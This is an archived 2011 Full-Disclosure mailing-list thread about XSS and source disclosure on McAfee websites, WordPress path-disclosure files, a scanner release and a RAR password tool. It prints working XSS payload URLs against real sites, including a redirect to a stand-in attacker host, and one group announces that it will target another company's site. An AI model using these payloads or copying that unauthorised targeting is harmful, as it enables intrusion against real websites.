 view-source:http://download.mcafee.com/us/bannerAd.asp
 
   view-source:
 http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
 
 
  2. RECOMMENDATION
 
  - Fully utilize Mcafee FoundStone Experts
  - Use outbound monitoring of traffic to detect potential information
  leakage
 
 
  3. VENDOR
 
  McAfee Inc
  http://www.mcafee.com
 
 
  4. DISCLOSURE TIME-LINE
 
  2011-02-10: reported vendor
  2011-02-12: vendor replied we are working to resolve the issue as
  quickly as possible
  2011-03-27: vulnerability found to be unfixed completely
  2011-03-27: vulnerability disclosed
 
 
  5. REFERENCES
 
  Original Advisory URL:
 
 
 http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
  Former Disclosure, 2008:
  http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
  Former Disclosure, 2009:
 
 
 http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
  Former Disclosure, 2010:
 
 
 http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
  host-extract: http://code.google.com/p/host-extract/
  Demo:
  http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
  xssed: 

Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Quentin Ducas
It is still available at http://insectpro.highprofilesite.com/
Free, no donation required.

Quentin


2011/3/30 runlvl run...@gmail.com:
 Insecurity Research is happy to announce the release of version 2.5,
 get it now while is still hot !

 Insect Pro 2.5 is a penetration security auditing and testing software
 solution designed to allow organizations of all sizes mitigate,
 monitor and manage the latest security threats vulnerabilities.

 We’re always working to improve Insect Pro and now the users obtain
 a new feature: A fully automated active web application security
 reconnaissance tool.

 Check it out: http://www.youtube.com/watch?v=ifiyHem7fMA

 We invite you to take a visual tour where you can find screenshots and
 videos, visit us now at http://www.insecurityresearch.com

 There is no fixed price to get a copy, you can obtain the full version
 by making a minimum donation to keep us coding.

 We are really thankful with the community!

 Get it now from: http://www.insecurityresearch.com

 Juan Sacco

 --
 _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.5 was released stay tunned

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Cal Leeming
?

On Wed, Mar 30, 2011 at 1:49 PM, Benji m...@b3nji.com wrote:

 I'm sure they pjear the xss 4nd w3bbug f1nd1ng sk1llz of the renowned
 ethical hacking group YGN!!!111


 (Plzdontxssme)

 On 3/30/11, YGN Ethical Hacker Group li...@yehg.net wrote:
  According to xssed.com,  there are two remaining XSS issues:
 
  https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
  https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //
 
 
  You guys know our disclosed issues are very simple and can easily be
  found through viewing HTML/JS source codes and simple Google Hacking
  (
 http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
 
  However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
  http://www.cenzic.com/company/management/khera/,  according to Network
  World News editor - Ellen Messmer.  Thus, the next target is Cenzic
  web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
  is.
 
 
  -
  Best regards,
  YGN Ethical Hacker Group
  Yangon, Myanmar (Burma)
  http://yehg.net
  Our Lab | http://yehg.net/lab
  Our Directory | http://yehg.net/hwd
 
 
 
 
  On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes pa...@ximen.es wrote:
  FIY
 
 
 http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
 
 
  Pablo Ximenes
  http://ximen.es/
  http://twitter.com/pabloximenes
 
 
 
 
  2011/3/28 Pablo Ximenes pa...@ximen.es:
  blog post about this: http://ximen.es/?p=469
 
  Please, don't throw stones at me.
 
  []'s
 
 
  Pablo Ximenes
  http://ximen.es/
  http://twitter.com/pabloximenes
 
 
 
  2011/3/27 YGN Ethical Hacker Group li...@yehg.net
 
  Vulnerabilities in *McAfee.com
 
 
  1. VULNERABILITY DESCRIPTION
 
  - Cross Site Scripting
 
 
 http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in
 ')
 
  - Information Disclosure  Internal Hostname:
 http://www.mcafee.com/js/omniture/omniture_profile.js
 
 ($ ruby host-extract.rb -a
  http://www.mcafee.com/js/omniture/omniture_profile.js)
 
  - Information Disclosure  Source Code Disclosure:
 
 
   view-source:
 http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
 
   view-source:
 http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
 
   view-source:
 http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
 view-source:
 http://download.mcafee.com/clinic/Includes/common.asp
 
   view-source:http://download.mcafee.com/updates/upgrade_patches.asp
 
   view-source:http://download.mcafee.com/updates/common/dat_common.asp
 view-source:http://download.mcafee.com/updates/updates.asp
 view-source:http://download.mcafee.com/updates/superDat.asp
 view-source:http://download.mcafee.com/eval/evaluate2.asp
 
   view-source:http://download.mcafee.com/common/ssi/conditionals.asp
 
   view-source:
 http://download.mcafee.com/common/ssi/errHandler_soft.asp
 view-source:
 http://download.mcafee.com/common/ssi/variables.asp
 
   view-source:
 http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
 view-source:
 http://download.mcafee.com/common/ssi/errHandler.asp
 view-source:
 http://download.mcafee.com/common/ssi/common_subs.asp
 
   view-source:
 http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
 view-source:http://download.mcafee.com/us/bannerAd.asp
 
   view-source:
 http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
 
 
  2. RECOMMENDATION
 
  - Fully utilize Mcafee FoundStone Experts
  - Use outbound monitoring of traffic to detect potential information
  leakage
 
 
  3. VENDOR
 
  McAfee Inc
  http://www.mcafee.com
 
 
  4. DISCLOSURE TIME-LINE
 
  2011-02-10: reported vendor
  2011-02-12: vendor replied we are working to resolve the issue as
  quickly as possible
  2011-03-27: vulnerability found to be unfixed completely
  2011-03-27: vulnerability disclosed
 
 
  5. REFERENCES
 
  Original Advisory URL:
 
 
 http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
  Former Disclosure, 2008:
  http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
  Former Disclosure, 2009:
 
 
 http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
  Former Disclosure, 2010:
 
 
 http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
  host-extract: http://code.google.com/p/host-extract/
  Demo:
  http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
  xssed: http://www.xssed.com/search?key=mcafee.com
  Lessont Learn:
 
 http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
 
  #yehg [2011-03-27]
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
 
 
 
 
  

Re: [Full-disclosure] HTB22905: Path disclosure in Wordpress

2011-03-30 Thread Christian Sciberras
With regards to the recent bugtrack advisory on WordPress DFA:

Re: HTB22905: Path disclosure in Wordpress



Ridiculous! I've been talking about this for some time, the actual
list of vulnerable files follows:

wp-admin\admin-functions.php
wp-admin\includes\admin.php
wp-admin\includes\class-ftp-pure.php
wp-admin\includes\class-ftp-sockets.php
wp-admin\includes\class-wp-filesystem-direct.php
wp-admin\includes\class-wp-filesystem-ftpext.php
wp-admin\includes\class-wp-filesystem-ftpsockets.php
wp-admin\includes\class-wp-filesystem-ssh2.php
wp-admin\includes\comment.php
wp-admin\includes\continents-cities.php
wp-admin\includes\file.php
wp-admin\includes\media.php
wp-admin\includes\misc.php
wp-admin\includes\ms.php
wp-admin\includes\nav-menu.php
wp-admin\includes\plugin-install.php
wp-admin\includes\plugin.php
wp-admin\includes\schema.php
wp-admin\includes\template.php
wp-admin\includes\theme-install.php
wp-admin\includes\update.php
wp-admin\includes\upgrade.php
wp-admin\includes\user.php
wp-admin\maint\repair.php
wp-admin\menu-header.php
wp-admin\menu.php
wp-admin\options-head.php
wp-admin\upgrade-functions.php
wp-config.php
wp-content\themes\twentyten\404.php
wp-content\themes\twentyten\archive.php
wp-content\themes\twentyten\attachment.php
wp-content\themes\twentyten\author.php
wp-content\themes\twentyten\category.php
wp-content\themes\twentyten\comments.php
wp-content\themes\twentyten\footer.php
wp-content\themes\twentyten\functions.php
wp-content\themes\twentyten\header.php
wp-content\themes\twentyten\loop.php
wp-content\themes\twentyten\onecolumn-page.php
wp-content\themes\twentyten\page.php
wp-content\themes\twentyten\search.php
wp-content\themes\twentyten\sidebar-footer.php
wp-content\themes\twentyten\sidebar.php
wp-content\themes\twentyten\single.php
wp-content\themes\twentyten\tag.php
wp-includes\Text\Diff\Engine\native.php
wp-includes\Text\Diff\Engine\string.php
wp-includes\Text\Diff\Engine\xdiff.php
wp-includes\Text\Diff\Renderer\inline.php
wp-includes\Text\Diff\Renderer.php
wp-includes\Text\Diff.php
wp-includes\cache.php
wp-includes\canonical.php
wp-includes\class-feed.php
wp-includes\class-simplepie.php
wp-includes\class-snoopy.php
wp-includes\class.wp-scripts.php
wp-includes\class.wp-styles.php
wp-includes\classes.php
wp-includes\comment-template.php
wp-includes\default-embeds.php
wp-includes\default-filters.php
wp-includes\default-widgets.php
wp-includes\feed-atom-comments.php
wp-includes\feed-atom.php
wp-includes\feed-rdf.php
wp-includes\feed-rss.php
wp-includes\feed-rss2-comments.php
wp-includes\feed-rss2.php
wp-includes\general-template.php
wp-includes\js\tinymce\langs\wp-langs.php
wp-includes\js\tinymce\plugins\spellchecker\classes\EnchantSpell.php
wp-includes\js\tinymce\plugins\spellchecker\classes\GoogleSpell.php
wp-includes\js\tinymce\plugins\spellchecker\classes\PSpell.php
wp-includes\js\tinymce\plugins\spellchecker\classes\PSpellShell.php
wp-includes\js\tinymce\plugins\spellchecker\config.php
wp-includes\js\tinymce\wp-mce-help.php
wp-includes\kses.php
wp-includes\l10n.php
wp-includes\media.php
wp-includes\ms-default-constants.php
wp-includes\ms-default-filters.php
wp-includes\ms-functions.php
wp-includes\ms-settings.php
wp-includes\nav-menu-template.php
wp-includes\post.php
wp-includes\query.php
wp-includes\registration-functions.php
wp-includes\rss-functions.php
wp-includes\rss.php
wp-includes\script-loader.php
wp-includes\shortcodes.php
wp-includes\taxonomy.php
wp-includes\template-loader.php
wp-includes\theme-compat\comments-popup.php
wp-includes\theme-compat\comments.php
wp-includes\theme-compat\footer.php
wp-includes\theme-compat\header.php
wp-includes\theme-compat\sidebar.php
wp-includes\theme.php
wp-includes\update.php
wp-includes\user.php
wp-includes\vars.php
wp-includes\widgets.php
wp-includes\wp-db.php
wp-includes\wp-diff.php
wp-settings.php

That's some 30%-40% of all Wordpress files (depending on Wordpress install).

I considered publishing this formally but...

http://codex.wordpress.org/Security_FAQ
See the 5th clause.

If they can't be bothered with proper coding practices, I won't bother
arguing what the meaning behind optimal security is either.
For the record, keep in mind that hiding the said errors from output
still doesn't stop them from being logged in the infamous error_log,
which of course can be fixed by (un)setting yet another config.

Seems useless to point out that security is about not shooting at your
own feet as opposed to doing so and mending them later on.

EOR

Chris.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread runlvl
The INSECT Pro version hosted on that site is really old, from what I
see is the version 1.1 and is not an official version, on the other
side. INSECT Pro 2.5 is free and we only ask for a donation to show
interest. The amount of the donation is not fixed.

We want to say thanks to the community that allows us to further
develop and thank to you we can afford a decent hosting so you can
download updates directly from our site.

Just as there are trolls on this list going around and insulting
everyone, too many people are worthwhile and that is why we continue
learning and developing for this project.

Greetings!
Juan Sacco

 --
_
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.5 was released stay tunned

2011/3/30 Quentin Ducas quentin@gmail.com:
 It is still available at http://insectpro.highprofilesite.com/
 Free, no donation required.

 Quentin


 2011/3/30 runlvl run...@gmail.com:
 Insecurity Research is happy to announce the release of version 2.5,
 get it now while is still hot !

 Insect Pro 2.5 is a penetration security auditing and testing software
 solution designed to allow organizations of all sizes mitigate,
 monitor and manage the latest security threats vulnerabilities.

 We’re always working to improve Insect Pro and now the users obtain
 a new feature: A fully automated active web application security
 reconnaissance tool.

 Check it out: http://www.youtube.com/watch?v=ifiyHem7fMA

 We invite you to take a visual tour where you can find screenshots and
 videos, visit us now at http://www.insecurityresearch.com

 There is no fixed price to get a copy, you can obtain the full version
 by making a minimum donation to keep us coding.

 We are really thankful with the community!

 Get it now from: http://www.insecurityresearch.com

 Juan Sacco

 --
 _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.5 was released stay tunned

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HTB22905: Path disclosure in Wordpress

2011-03-30 Thread Christian Sciberras
By the way, I didn't see this mentioned anywhere (yet); since there
are so many unprotected files, one can easily detect the wordpress
version by comparing error line numbers.





On Wed, Mar 30, 2011 at 4:39 PM, Christian Sciberras uuf6...@gmail.com wrote:
 With regards to the recent bugtrack advisory on WordPress DFA:

 Re: HTB22905: Path disclosure in Wordpress

 

 Ridiculous! I've been talking about this for some time, the actual
 list of vulnerable files follows:

 wp-admin\admin-functions.php
 wp-admin\includes\admin.php
 wp-admin\includes\class-ftp-pure.php
 wp-admin\includes\class-ftp-sockets.php
 wp-admin\includes\class-wp-filesystem-direct.php
 wp-admin\includes\class-wp-filesystem-ftpext.php
 wp-admin\includes\class-wp-filesystem-ftpsockets.php
 wp-admin\includes\class-wp-filesystem-ssh2.php
 wp-admin\includes\comment.php
 wp-admin\includes\continents-cities.php
 wp-admin\includes\file.php
 wp-admin\includes\media.php
 wp-admin\includes\misc.php
 wp-admin\includes\ms.php
 wp-admin\includes\nav-menu.php
 wp-admin\includes\plugin-install.php
 wp-admin\includes\plugin.php
 wp-admin\includes\schema.php
 wp-admin\includes\template.php
 wp-admin\includes\theme-install.php
 wp-admin\includes\update.php
 wp-admin\includes\upgrade.php
 wp-admin\includes\user.php
 wp-admin\maint\repair.php
 wp-admin\menu-header.php
 wp-admin\menu.php
 wp-admin\options-head.php
 wp-admin\upgrade-functions.php
 wp-config.php
 wp-content\themes\twentyten\404.php
 wp-content\themes\twentyten\archive.php
 wp-content\themes\twentyten\attachment.php
 wp-content\themes\twentyten\author.php
 wp-content\themes\twentyten\category.php
 wp-content\themes\twentyten\comments.php
 wp-content\themes\twentyten\footer.php
 wp-content\themes\twentyten\functions.php
 wp-content\themes\twentyten\header.php
 wp-content\themes\twentyten\loop.php
 wp-content\themes\twentyten\onecolumn-page.php
 wp-content\themes\twentyten\page.php
 wp-content\themes\twentyten\search.php
 wp-content\themes\twentyten\sidebar-footer.php
 wp-content\themes\twentyten\sidebar.php
 wp-content\themes\twentyten\single.php
 wp-content\themes\twentyten\tag.php
 wp-includes\Text\Diff\Engine\native.php
 wp-includes\Text\Diff\Engine\string.php
 wp-includes\Text\Diff\Engine\xdiff.php
 wp-includes\Text\Diff\Renderer\inline.php
 wp-includes\Text\Diff\Renderer.php
 wp-includes\Text\Diff.php
 wp-includes\cache.php
 wp-includes\canonical.php
 wp-includes\class-feed.php
 wp-includes\class-simplepie.php
 wp-includes\class-snoopy.php
 wp-includes\class.wp-scripts.php
 wp-includes\class.wp-styles.php
 wp-includes\classes.php
 wp-includes\comment-template.php
 wp-includes\default-embeds.php
 wp-includes\default-filters.php
 wp-includes\default-widgets.php
 wp-includes\feed-atom-comments.php
 wp-includes\feed-atom.php
 wp-includes\feed-rdf.php
 wp-includes\feed-rss.php
 wp-includes\feed-rss2-comments.php
 wp-includes\feed-rss2.php
 wp-includes\general-template.php
 wp-includes\js\tinymce\langs\wp-langs.php
 wp-includes\js\tinymce\plugins\spellchecker\classes\EnchantSpell.php
 wp-includes\js\tinymce\plugins\spellchecker\classes\GoogleSpell.php
 wp-includes\js\tinymce\plugins\spellchecker\classes\PSpell.php
 wp-includes\js\tinymce\plugins\spellchecker\classes\PSpellShell.php
 wp-includes\js\tinymce\plugins\spellchecker\config.php
 wp-includes\js\tinymce\wp-mce-help.php
 wp-includes\kses.php
 wp-includes\l10n.php
 wp-includes\media.php
 wp-includes\ms-default-constants.php
 wp-includes\ms-default-filters.php
 wp-includes\ms-functions.php
 wp-includes\ms-settings.php
 wp-includes\nav-menu-template.php
 wp-includes\post.php
 wp-includes\query.php
 wp-includes\registration-functions.php
 wp-includes\rss-functions.php
 wp-includes\rss.php
 wp-includes\script-loader.php
 wp-includes\shortcodes.php
 wp-includes\taxonomy.php
 wp-includes\template-loader.php
 wp-includes\theme-compat\comments-popup.php
 wp-includes\theme-compat\comments.php
 wp-includes\theme-compat\footer.php
 wp-includes\theme-compat\header.php
 wp-includes\theme-compat\sidebar.php
 wp-includes\theme.php
 wp-includes\update.php
 wp-includes\user.php
 wp-includes\vars.php
 wp-includes\widgets.php
 wp-includes\wp-db.php
 wp-includes\wp-diff.php
 wp-settings.php

 That's some 30%-40% of all Wordpress files (depending on Wordpress install).

 I considered publishing this formally but...

 http://codex.wordpress.org/Security_FAQ
 See the 5th clause.

 If they can't be bothered with proper coding practices, I won't bother
 arguing what the meaning behind optimal security is either.
 For the record, keep in mind that hiding the said errors from output
 still doesn't stop them from being logged in the infamous error_log,
 which of course can be fixed by (un)setting yet another config.

 Seems useless to point out that security is about not shooting at your
 own feet as opposed to doing so and mending them later on.

 EOR

 Chris.


___

Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Benji
The amount of the donation is not fixed.


Can I make a 0 euro donation?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread nix
 The amount of the donation is not fixed.


 Can I make a 0 euro donation?



Are you bored or stupid, or both?


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker

2011-03-30 Thread Tim
  why do we need installer then? distribute that tool as single 
  executable.
 
 Because without the installer, it can't try to monetize the install by 
 installing search toolbars! (It's nice enough to continue the install if you 
 reject their terms, though.)
 
 
 On 2011-03-29, at 13:13, Jo Galara wrote:
  How does it work? Bruteforce?
 
 Yes, but... well, JAD does a better job of explaining than I possibly could:
 
   Runtime rt = Runtime.getRuntime();
  
   String str = 7z.exe x ;
   str = str + \ + _filepath + \ ;
   str = str + -p\ + pwd + \ ;
   str = str + -o\ + _destpath + \;
   str = str +  -y;
  
   System.out.println(str);
  
   Process p = rt.exec(str);
   p.waitFor();
  
   if (p.exitValue() == 0)
   {
 ret = true;
   }


That's funny (i.e. pathetic).

A quick search of the tool's website doesn't reveal any links to the
7-zip website.  I'm not going to bother to download this tool, since a
1-line shell script would accomplish the same thing, but if 7-zip
isn't linked to in the accompanying documentation, then that would be
a violation of the LGPL.  From 7-zip's FAQ:

  Can I use the EXE or DLL files from 7-Zip in a Commercial Application?

  Yes, but you are required to specify in your documentation (1) that
  you used parts of the 7-Zip program, (2) that 7-Zip is licensed under
  the GNU LGPL license and (3) you must give a link to www.7-zip.org,
  where the source code can be found.


tim

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Benji
Neither, I was curious as to what he'd say, and I was pleasantly
surprised (offered to send me a copy).

Calm down kid.

On 3/30/11, n...@myproxylists.com n...@myproxylists.com wrote:
 The amount of the donation is not fixed.


 Can I make a 0 euro donation?



 Are you bored or stupid, or both?




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Thor (Hammer of God)
Let's see here... As an ethical hacker group, you don't like being criticized 
by someone as engaging in illegal activities, so you announce on a public site 
that you are going to attack the company?   Brilliant. 
t


-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of YGN Ethical 
Hacker Group
Sent: Wednesday, March 30, 2011 5:44 AM
To: Pablo Ximenes
Cc: full-disclosure
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

According to xssed.com,  there are two remaining XSS issues:

https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); // 
https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //


You guys know our disclosed issues are very simple and can easily be found 
through viewing HTML/JS source codes and simple Google Hacking 
(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

However,  it was criticized as 'illegal break-in' by Cenzic's CMO, 
http://www.cenzic.com/company/management/khera/,  according to Network World 
News editor - Ellen Messmer.  Thus, the next target is Cenzic web site. Let's 
see how strong the Kung-Fu of Cenzic HailStorm scanner is.


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar (Burma)
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd




On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes pa...@ximen.es wrote:
 FIY

 http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-S
 ecurity-Holes


 Pablo Ximenes
 http://ximen.es/
 http://twitter.com/pabloximenes




 2011/3/28 Pablo Ximenes pa...@ximen.es:
 blog post about this: http://ximen.es/?p=469

 Please, don't throw stones at me.

 []'s


 Pablo Ximenes
 http://ximen.es/
 http://twitter.com/pabloximenes



 2011/3/27 YGN Ethical Hacker Group li...@yehg.net

 Vulnerabilities in *McAfee.com


 1. VULNERABILITY DESCRIPTION

 - Cross Site Scripting

 http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.l
 ocation.replace('attacker.in')

 - Information Disclosure  Internal Hostname:
    http://www.mcafee.com/js/omniture/omniture_profile.js

    ($ ruby host-extract.rb -a
 http://www.mcafee.com/js/omniture/omniture_profile.js)

 - Information Disclosure  Source Code Disclosure:


  
 view-source:http://download.mcafee.com/clinic/includes/commoninc/coo
 kiecommon.asp

  
 view-source:http://download.mcafee.com/clinic/includes/commoninc/app
 common.asp

  
 view-source:http://download.mcafee.com/clinic/includes/commoninc/par
 tnerCodesLibrary.asp
        
 view-source:http://download.mcafee.com/clinic/Includes/common.asp
        
 view-source:http://download.mcafee.com/updates/upgrade_patches.asp

  
 view-source:http://download.mcafee.com/updates/common/dat_common.asp
        view-source:http://download.mcafee.com/updates/updates.asp
        view-source:http://download.mcafee.com/updates/superDat.asp
        view-source:http://download.mcafee.com/eval/evaluate2.asp
        
 view-source:http://download.mcafee.com/common/ssi/conditionals.asp

  
 view-source:http://download.mcafee.com/common/ssi/errHandler_soft.as
 p
        
 view-source:http://download.mcafee.com/common/ssi/variables.asp

  
 view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_c
 ontrols.asp
        
 view-source:http://download.mcafee.com/common/ssi/errHandler.asp
        
 view-source:http://download.mcafee.com/common/ssi/common_subs.asp

  
 view-source:http://download.mcafee.com/us/upgradeCenter/productCompa
 rison_top.asp
        view-source:http://download.mcafee.com/us/bannerAd.asp

  
 view-source:http://download.mcafee.com/common/ssi/standard/global_fo
 ot_us.asp


 2. RECOMMENDATION

 - Fully utilize Mcafee FoundStone Experts
 - Use outbound monitoring of traffic to detect potential information 
 leakage


 3. VENDOR

 McAfee Inc
 http://www.mcafee.com


 4. DISCLOSURE TIME-LINE

 2011-02-10: reported vendor
 2011-02-12: vendor replied we are working to resolve the issue as 
 quickly as possible
 2011-03-27: vulnerability found to be unfixed completely
 2011-03-27: vulnerability disclosed


 5. REFERENCES

 Original Advisory URL:

 http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_i
 nfoleak
 Former Disclosure, 2008:
 http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
 Former Disclosure, 2009:

 http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks
 -110667.shtml
 Former Disclosure, 2010:

 http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-de
 facement.html
 host-extract: http://code.google.com/p/host-extract/
 Demo: 
 http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
 xssed: http://www.xssed.com/search?key=mcafee.com
 Lessont Learn:
 http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned
 -from-a-security-breach

 #yehg [2011-03-27]

 ___
 Full-Disclosure - We 

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Christian Sciberras
Thor, that's just a marketing adjective.

Just like when you're asked to buy authentic replica r0lex watches.

Cheers,
Chris.




On Wed, Mar 30, 2011 at 5:22 PM, Thor (Hammer of God)
t...@hammerofgod.com wrote:
 Let's see here... As an ethical hacker group, you don't like being 
 criticized by someone as engaging in illegal activities, so you announce on a 
 public site that you are going to attack the company?   Brilliant.
 t


 -Original Message-
 From: full-disclosure-boun...@lists.grok.org.uk 
 [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of YGN Ethical 
 Hacker Group
 Sent: Wednesday, March 30, 2011 5:44 AM
 To: Pablo Ximenes
 Cc: full-disclosure
 Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

 According to xssed.com,  there are two remaining XSS issues:

 https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); // 
 https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //


 You guys know our disclosed issues are very simple and can easily be found 
 through viewing HTML/JS source codes and simple Google Hacking 
 (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

 However,  it was criticized as 'illegal break-in' by Cenzic's CMO, 
 http://www.cenzic.com/company/management/khera/,  according to Network World 
 News editor - Ellen Messmer.  Thus, the next target is Cenzic web site. Let's 
 see how strong the Kung-Fu of Cenzic HailStorm scanner is.


 -
 Best regards,
 YGN Ethical Hacker Group
 Yangon, Myanmar (Burma)
 http://yehg.net
 Our Lab | http://yehg.net/lab
 Our Directory | http://yehg.net/hwd




 On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes pa...@ximen.es wrote:
 FIY

 http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-S
 ecurity-Holes


 Pablo Ximenes
 http://ximen.es/
 http://twitter.com/pabloximenes




 2011/3/28 Pablo Ximenes pa...@ximen.es:
 blog post about this: http://ximen.es/?p=469

 Please, don't throw stones at me.

 []'s


 Pablo Ximenes
 http://ximen.es/
 http://twitter.com/pabloximenes



 2011/3/27 YGN Ethical Hacker Group li...@yehg.net

 Vulnerabilities in *McAfee.com


 1. VULNERABILITY DESCRIPTION

 - Cross Site Scripting

 http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.l
 ocation.replace('attacker.in')

 - Information Disclosure  Internal Hostname:
    http://www.mcafee.com/js/omniture/omniture_profile.js

    ($ ruby host-extract.rb -a
 http://www.mcafee.com/js/omniture/omniture_profile.js)

 - Information Disclosure  Source Code Disclosure:



 view-source:http://download.mcafee.com/clinic/includes/commoninc/coo
 kiecommon.asp


 view-source:http://download.mcafee.com/clinic/includes/commoninc/app
 common.asp


 view-source:http://download.mcafee.com/clinic/includes/commoninc/par
 tnerCodesLibrary.asp

 view-source:http://download.mcafee.com/clinic/Includes/common.asp

 view-source:http://download.mcafee.com/updates/upgrade_patches.asp


 view-source:http://download.mcafee.com/updates/common/dat_common.asp
        view-source:http://download.mcafee.com/updates/updates.asp
        view-source:http://download.mcafee.com/updates/superDat.asp
        view-source:http://download.mcafee.com/eval/evaluate2.asp

 view-source:http://download.mcafee.com/common/ssi/conditionals.asp


 view-source:http://download.mcafee.com/common/ssi/errHandler_soft.as
 p

 view-source:http://download.mcafee.com/common/ssi/variables.asp


 view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_c
 ontrols.asp

 view-source:http://download.mcafee.com/common/ssi/errHandler.asp

 view-source:http://download.mcafee.com/common/ssi/common_subs.asp


 view-source:http://download.mcafee.com/us/upgradeCenter/productCompa
 rison_top.asp
        view-source:http://download.mcafee.com/us/bannerAd.asp


 view-source:http://download.mcafee.com/common/ssi/standard/global_fo
 ot_us.asp


 2. RECOMMENDATION

 - Fully utilize Mcafee FoundStone Experts
 - Use outbound monitoring of traffic to detect potential information
 leakage


 3. VENDOR

 McAfee Inc
 http://www.mcafee.com


 4. DISCLOSURE TIME-LINE

 2011-02-10: reported vendor
 2011-02-12: vendor replied we are working to resolve the issue as
 quickly as possible
 2011-03-27: vulnerability found to be unfixed completely
 2011-03-27: vulnerability disclosed


 5. REFERENCES

 Original Advisory URL:

 http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_i
 nfoleak
 Former Disclosure, 2008:
